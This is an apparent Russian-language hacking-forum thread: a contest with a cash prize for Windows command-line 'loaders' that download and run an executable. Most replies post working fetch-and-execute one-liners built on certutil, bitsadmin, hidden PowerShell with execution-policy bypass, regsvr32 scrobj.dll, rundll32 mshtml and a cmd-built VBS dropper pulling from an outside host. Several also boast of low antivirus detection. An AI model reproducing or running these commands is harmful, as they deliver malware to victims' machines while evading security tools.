• XSS.stack #1 – первый литературный журнал от юзеров форума

CMD Loader КОНКУРС

Статус
Закрыто для дальнейших ответов.
Отслеживать

Pent

RAM
Пользователь
Регистрация
27.06.2020
Сообщения
102
Реакции
15
Депозит
0.0001
Цель конкурса имея в распоряжении консоль виндовс дропнуть на диск и запустить или исполнить в памяти exe файл.
Приз 300$.
Конкурс продлится неделю.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
cd %temp% && certutil.exe -urlcache -split -f [URL]https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe[/URL] ./test.exe && start ./test.exe
 
Последнее редактирование:
Powershell способ N1
Дроп на диск
PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://сервер/installer.exe',"$env:APPDATA\installer.exe");Start-Process ('$env:APPDATA\installer.exe')
 
Последнее редактирование:
Powershell способ N2
Загружаем в память
Your base64 encoded binary

$InputString = '...........'

function Invoke-ReflectivePEInjection

{

......
......
......

}

ReflectivePEInjection
 
Код: 
start /min rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("cmd /c certutil -urlcache -split -f https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe %APPDATA%\putty.exe & start %APPDATA%\putty.exe"),0)
 
Pent сказал(а):
Цель собрать как можно больще способов в одном месте
Там уже всё и собрали. Приваты тут выкладывать бесплатно (или даже за 300 баксов) не будут.
 
Pernat1y сказал(а):
Там уже всё и собрали. Приваты тут выкладывать бесплатно (или даже за 300 баксов) не будут.
Да это понятно но как понимаю тс решил собрать команды или способы не так задроченные,мне вот интересна тема для макросов так как команды там много играют роль,как пример возьмем любой паблик с гитхаба vba.txt

первая команда;детект 15/30 Virus Scan Results
Код: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w Hidden regsvr32.exe  /s /i:http://127.0.01/server.sct scrobj.dll
вторая;детект 2/30 Virus Scan Results
Код: 
C:\Windows\System32\cmd.exe /c bitsadmin /transfer /download /priority HIGH https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe %temp%\\putty.exe>nul & start %temp%\\putty.exe

Да и на LOLBAS не все же есть,чисто справка а не сами точные команды,вот как последний пример)))
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Just for Fun...
Play like a Pro

Код: 
cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>x4crow.vbs
&@echo objXMLHTTP.open "GET","http://x4crow.com/a.txt",false>>x4crow.vbs&@echo objXMLHTTP.send()>>x4crow.vbs&@echo If objXMLH
TTP.Status=200 Then>>x4crow.vbs&@echo Set objADOStream=CreateObject("ADODB
.Stream")>>x4crow.vbs&@echo objADOStream.Open>>x4Crow.vbs&@echo objADOStream.
Type=1 >>x4Crow.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>x4Crow.
vbs&@echo objADOStream.Position=0 >>x4Crow.vbs&@echo objADOStream.SaveToFi
le "goodluck.exe">>x4Crow.vbs&@echo objADOStream.Close>>x4Crow.vbs&@echo Set objA
DOStream=Nothing>>x4Crow.vbs&@echo End if>>x4Crow.vbs&@echo Set objXMLHTTP=No
thing>>x4Crow.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>x4crow.vbs&
@echo objShell.Exec("goodluck.exe")>>x4Crow.vbs&cscript.exe x4Crow.vbs"

Play with This for 0 Detections
Good Luck ;)
 
bbi34yy сказал(а):
IMHO, человек который первый дал ссылку на "lolbas" - выйграл.
Больше, как сказали выше, вряд ли кто-то предложит. :)
Возможно больше не предложать но предложат интереснее, решать по итогу вам.
 
Последнее редактирование:
Код: 
conhost.exe powershell.exe -w Hidden regsvr32.exe  /s /i:http://127.0.0.1/test.sct scrobj.dll
 

Вложения

  • 2020-09-17_102218.gif
    2020-09-17_102218.gif
    18.9 КБ · Просмотры: 51
Конкурс подошел к концу, активнее всего был участник corpserves, думаю справедливо будет отдать победу ему, corpserves прошу скинуть адрес BTC в пм.
 
Статус
Закрыто для дальнейших ответов.
Верх